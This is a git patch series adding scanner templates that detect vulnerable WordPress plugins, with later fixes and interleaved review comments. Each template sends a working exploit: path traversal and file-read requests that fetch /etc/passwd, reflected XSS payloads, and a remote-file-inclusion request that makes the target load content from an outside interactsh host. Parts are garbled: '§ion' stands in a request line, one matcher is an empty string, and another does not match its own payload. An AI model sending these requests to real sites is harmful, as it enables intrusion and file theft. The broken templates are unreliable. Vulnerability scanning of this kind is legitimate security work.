From f29d2b20df653cb4eed8a99cb12a5e73fc7dc3cf Mon Sep 17 00:00:00 2001
From: cckuailong <346813862@qq.com>
Date: Tue, 8 Feb 2022 09:07:19 +0800
Subject: [PATCH 01/11] add some wp plugins cves
---
cves/2020/CVE-2020-35749.yaml | 42 ++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24300.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24488.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24926.yaml | 43 +++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24947.yaml | 40 +++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24991.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-25008.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-25052.yaml | 42 ++++++++++++++++++++++++++++++++
8 files changed, 347 insertions(+)
create mode 100644 cves/2020/CVE-2020-35749.yaml
create mode 100644 cves/2021/CVE-2021-24300.yaml
create mode 100644 cves/2021/CVE-2021-24488.yaml
create mode 100644 cves/2021/CVE-2021-24926.yaml
create mode 100644 cves/2021/CVE-2021-24947.yaml
create mode 100644 cves/2021/CVE-2021-24991.yaml
create mode 100644 cves/2021/CVE-2021-25008.yaml
create mode 100644 cves/2021/CVE-2021-25052.yaml
diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml
new file mode 100644
index 0000000000..32ba707b50
--- /dev/null
+++ b/cves/2020/CVE-2020-35749.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-35749
+
+info:
+ name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
+ author: cckuailong
+ severity: high
+ description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
+ reference:
+ - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35749
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 7.7
+ cve-id: CVE-2020-35749
+ cwe-id: CWE-22
+ tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
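Review bot: The second request hard-codes `post=372`, so the check silently returns a false negative on any site where that post ID does not exist or is not a Simple Job Board application post, and nothing in the file records that assumption. The login step also depends on `{{username}}` and `{{password}}`, which are declared nowhere in the template. Add a comment under `info`, e.g. `# requires -var username=<user> -var password=<pass>; post=372 must be an existing application post id on the target`, so both assumptions are visible to whoever runs or maintains the template.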
diff --git a/cves/2021/CVE-2021-24300.yaml b/cves/2021/CVE-2021-24300.yaml
new file mode 100644
index 0000000000..5813a472a8
--- /dev/null
+++ b/cves/2021/CVE-2021-24300.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24300
+
+info:
+ name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24300
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "onmouseover=alert(1)"
+ - "PickPlugins Product Slider"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
new file mode 100644
index 0000000000..b3034c8c49
--- /dev/null
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24488
+
+info:
+ name: WordPress Plugin Post Grid < 2.1.8 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+ reference:
+ - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24488
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="> HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ">"
+ - "Post Grid Settings"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24926.yaml b/cves/2021/CVE-2021-24926.yaml
new file mode 100644
index 0000000000..2fe9af8eff
--- /dev/null
+++ b/cves/2021/CVE-2021-24926.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-24926
+
+info:
+ name: WordPress Plugin Domain Check < 1.0.17 - XSS
+ author: cckuailong
+ severity: medium
+ description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
+ classification:
+ cve-id: CVE-2021-24926
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Domain Check"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
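Review bot: The `classification:` block here carries only `cve-id` and `cwe-id`, while the other templates in this series also record `cvss-metrics` and `cvss-score`; the same gap exists in cves/2021/CVE-2021-24947.yaml. Without a vector the `severity: medium` is not backed by anything in the file. Add the two fields from the referenced NVD entry, `cvss-metrics: <CVSS vector from NVD>` and `cvss-score: <score from NVD>` (placeholders to be filled in), in both templates.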
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
new file mode 100644
index 0000000000..ed2f2b4aa2
--- /dev/null
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-24947
+
+info:
+ name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
+ author: cckuailong
+ severity: high
+ description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24947
+ classification:
+ cve-id: CVE-2021-24947
+ cwe-id: CWE-23
+ tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
new file mode 100644
index 0000000000..e4634309d9
--- /dev/null
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24991
+
+info:
+ name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
+ author: cckuailong
+ severity: medium
+ description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2021-24991
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "WooCommerce PDF Invoices"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
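Review bot: As rendered here the request line reads `page=wpo_wcpdf_options_page§ion=%22...`, which looks like `&section=` after an HTML-entity decoding step turned `&sect` into `§` during extraction; the same text survives unchanged into the later patch that updates this file. If the on-disk template really contains `§ion`, the `section` parameter named in the description is never sent and the body matcher cannot fire. Confirm the committed line begins `GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=` rather than `...options_page§ion=`.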
diff --git a/cves/2021/CVE-2021-25008.yaml b/cves/2021/CVE-2021-25008.yaml
new file mode 100644
index 0000000000..43d30f94d5
--- /dev/null
+++ b/cves/2021/CVE-2021-25008.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-25008
+
+info:
+ name: The Code Snippets WordPress plugin < 2.14.3 - XSS
+ author: cckuailong
+ severity: medium
+ description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25008
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25008
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "Snippets"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
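Review bot: The wpscan reference `https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a` is the same UUID this series uses for CVE-2021-24947 and CVE-2021-24991, and later patches replace it in both of those files but not in this one, so the Code Snippets template is almost certainly left pointing at another plugin's advisory. Replace it with the advisory for this CVE, `- https://wpscan.com/vulnerability/<wpscan advisory id for CVE-2021-25008>`, and keep the NVD link as is.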
diff --git a/cves/2021/CVE-2021-25052.yaml b/cves/2021/CVE-2021-25052.yaml
new file mode 100644
index 0000000000..bea1788a4d
--- /dev/null
+++ b/cves/2021/CVE-2021-25052.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-25052
+
+info:
+ name: he Button Generator WordPress plugin < 2.3.3 - RFI
+ author: cckuailong
+ severity: high
+ description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
+ reference:
+ - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25052
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-25052
+ cwe-id: CWE-352
+ tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
\ No newline at end of file
From 8664885b453cd67986f26989f9995427d1cffb1a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:13:40 +0530
Subject: [PATCH 02/11] Update CVE-2020-35749.yaml
---
cves/2020/CVE-2020-35749.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml
index 32ba707b50..94c2be7907 100644
--- a/cves/2020/CVE-2020-35749.yaml
+++ b/cves/2020/CVE-2020-35749.yaml
@@ -13,7 +13,7 @@ info:
cvss-score: 7.7
cve-id: CVE-2020-35749
cwe-id: CWE-22
- tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
+ tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
@@ -25,11 +25,9 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
-
cookie-reuse: true
matchers-condition: and
matchers:
@@ -39,4 +37,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 1dc5ff098ada37a4172d3032a9b246d4fb0fc38e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:19:44 +0530
Subject: [PATCH 03/11] Update CVE-2021-24300.yaml
---
cves/2021/CVE-2021-24300.yaml | 12 ++++++++----
1 file changed, 8 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24300.yaml b/cves/2021/CVE-2021-24300.yaml
index 5813a472a8..33ab74ea05 100644
--- a/cves/2021/CVE-2021-24300.yaml
+++ b/cves/2021/CVE-2021-24300.yaml
@@ -25,9 +25,8 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
- GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
+ GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +35,15 @@ requests:
- type: word
part: body
words:
- - "onmouseover=alert(1)"
+ - 'value="\"onmouseover=alert(document.domain);//">'
- "PickPlugins Product Slider"
condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
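Review bot: The new matcher `'value="\"onmouseover=alert(document.domain);//">'` is single-quoted, so the `\` is a literal character the response body must contain; presumably that is deliberate and relies on the reflected value being slash-escaped by WordPress's request handling, but a later maintainer is likely to read it as a stray escape and delete it, turning the check into one that never matches. Add a comment above the entry, `# literal backslash is intended: the reflected value is slash-escaped`, so the intent survives. The header matcher added below it is a good addition; it needs no change.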
From a167a69be6709beac5ff90b2c26247130e5d0f9e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:32:39 +0530
Subject: [PATCH 04/11] Update CVE-2021-24488.yaml
---
cves/2021/CVE-2021-24488.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
index b3034c8c49..b0ac04b7da 100644
--- a/cves/2021/CVE-2021-24488.yaml
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -27,7 +27,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="> HTTP/1.1
+ GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +36,10 @@ requests:
- type: word
part: body
words:
- - ">"
- - "Post Grid Settings"
+ - 'value="\"onmouseover=alert(document.domain)/">'
+ - 'Post Grid'
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
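Review bot: The new request sends `keyword="onmouseover=alert(document.domain)//` while the new body matcher expects `alert(document.domain)/">` — one slash where the payload carries two — so unless the plugin collapses the slashes the reflected text `alert(document.domain)//">` never contains the matched string and the template cannot report a hit. Make the two agree, e.g. `- 'value="\"onmouseover=alert(document.domain)//">'`. The request line also leaves `"` and `/` unencoded where the sibling CVE-2021-24300 template percent-encodes the same characters; using one convention across the series would make these easier to review.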
From 2d3240a98f7cc3e282e10c0ac0e30534905d0a29 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:36:16 +0530
Subject: [PATCH 05/11] Update CVE-2021-24926.yaml
---
cves/2021/CVE-2021-24926.yaml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-24926.yaml b/cves/2021/CVE-2021-24926.yaml
index 2fe9af8eff..7a8c1e8d7d 100644
--- a/cves/2021/CVE-2021-24926.yaml
+++ b/cves/2021/CVE-2021-24926.yaml
@@ -25,7 +25,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo HTTP/1.1
+ GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -34,10 +34,10 @@ requests:
- type: word
part: body
words:
- - ""
+ - ""
- "Domain Check"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
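Review bot: As rendered here the first `words` entry on both sides of the second hunk is the empty string `""`, which every response body contains; with `condition: and` the matcher then reduces to "body contains `Domain Check`" plus status 200, which a patched plugin satisfies just as well as a vulnerable one. If this is an extraction artifact that stripped markup from the real entry, disregard; otherwise the entry should be the exact string the `domain=test.foo` request is expected to reflect, and a comment `# must be the unescaped reflection of the domain parameter` would document why.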
From 81a4316d2e9bf5b54edfbf654d88680162d7663a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:38:33 +0530
Subject: [PATCH 06/11] Update CVE-2021-24947.yaml
---
cves/2021/CVE-2021-24947.yaml | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
index ed2f2b4aa2..30f3484f54 100644
--- a/cves/2021/CVE-2021-24947.yaml
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -11,7 +11,7 @@ info:
classification:
cve-id: CVE-2021-24947
cwe-id: CWE-23
- tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
+ tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
requests:
- raw:
@@ -23,7 +23,6 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
Host: {{Hostname}}
@@ -37,4 +36,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 4fea6b14f49ff7067cede5ed8c9a369c8823f8e1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:42:32 +0530
Subject: [PATCH 07/11] Update CVE-2021-24991.yaml
---
cves/2021/CVE-2021-24991.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
index e4634309d9..8be68cf940 100644
--- a/cves/2021/CVE-2021-24991.yaml
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -6,7 +6,7 @@ info:
severity: medium
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
reference:
- - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
@@ -27,7 +27,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +36,10 @@ requests:
- type: word
part: body
words:
- - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
- "WooCommerce PDF Invoices"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 4fe9243d9d08ce67dc5386dced2a28fc9e7a4d69 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:49:53 +0530
Subject: [PATCH 08/11] Update CVE-2021-25008.yaml
---
cves/2021/CVE-2021-25008.yaml | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-25008.yaml b/cves/2021/CVE-2021-25008.yaml
index 43d30f94d5..7abdca8bd9 100644
--- a/cves/2021/CVE-2021-25008.yaml
+++ b/cves/2021/CVE-2021-25008.yaml
@@ -25,9 +25,8 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
- GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +35,10 @@ requests:
- type: word
part: body
words:
- - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
- "Snippets"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From b64401ab0263dc3a50b6a47bb27401b2c7b249f9 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:53:44 +0530
Subject: [PATCH 09/11] Update CVE-2021-25052.yaml
---
cves/2021/CVE-2021-25052.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-25052.yaml b/cves/2021/CVE-2021-25052.yaml
index bea1788a4d..f83fa69d8f 100644
--- a/cves/2021/CVE-2021-25052.yaml
+++ b/cves/2021/CVE-2021-25052.yaml
@@ -1,7 +1,7 @@
id: CVE-2021-25052
info:
- name: he Button Generator WordPress plugin < 2.3.3 - RFI
+ name: The Button Generator WordPress plugin < 2.3.3 - RFI
author: cckuailong
severity: high
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
@@ -36,7 +36,9 @@ requests:
- type: status
status:
- 200
+
- type: word
part: interactsh_protocol
+ name: http
words:
- - "dns"
\ No newline at end of file
+ - "http"
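Review bot: Switching the out-of-band matcher from `dns` to `http` lowers false positives (a bare DNS lookup can come from a resolver or link preview rather than from the include) but now misses hosts whose outbound HTTP is egress-filtered while DNS still resolves, so the trade-off deserves a comment, e.g. `# http interaction required: a dns-only hit is not proof the file was included`. Separately, this request makes the target `include()` whatever the interactsh endpoint serves; with the public default server that content is controlled by a third party, which is worth recording in `info` as `# the target include()s the interactsh response; run with a self-hosted interactsh server`.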
From ce903c73f2a922b343f77f4c0f9832448e8dd7dc Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:55:00 +0530
Subject: [PATCH 10/11] Update CVE-2021-24947.yaml
---
cves/2021/CVE-2021-24947.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
index 30f3484f54..248db03bae 100644
--- a/cves/2021/CVE-2021-24947.yaml
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -6,7 +6,7 @@ info:
severity: high
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
reference:
- - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
classification:
cve-id: CVE-2021-24947
From ba7c71e08165359ebcb1a89c332e402ba611d46f Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:57:33 +0530
Subject: [PATCH 11/11] Update CVE-2021-24488.yaml
---
